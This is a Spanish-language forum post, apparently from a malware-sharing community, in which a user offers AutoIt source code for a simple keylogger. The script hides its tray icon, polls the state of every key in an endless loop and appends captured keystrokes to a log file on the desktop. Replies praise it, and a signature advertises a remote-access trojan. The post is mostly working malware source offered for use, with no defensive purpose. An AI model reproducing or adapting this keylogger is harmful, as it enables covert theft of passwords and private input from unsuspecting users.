Código: Seleccionar todo

#NotrayIcon
#include <WinAPI.au3>
;==============================
; AutoIt
; Autor : M3
; Simple KeyLoguer Function
;==============================

sGetKey()

Func sGetKey()

While 1

Local  $sKey, $Result , $Log

For $sKey = 1 To 255

$Result = _WinAPI_GetAsyncKeyState($sKey)

If $Result = -32767 then

$Result = Chr($sKey)

$Log = FileOpen(@DesktopDir & "\Log.txt", 1)

FileWrite($Log, $Result)

FileClose($Log)

EndIf

Next

WEnd

Endfunc
Me da pereza explicar se tienem duda , preguntem ....Saludos
Indetectables RAT v.0.9.5

@Indetectables Team
muy bueno M3 cada día mejor con autoit, gracias :D
estoy matando el tiempo, mientras el tiempo nos mata lentamente..

Mostrar/Ocultar

Responder

Volver a “Fuentes”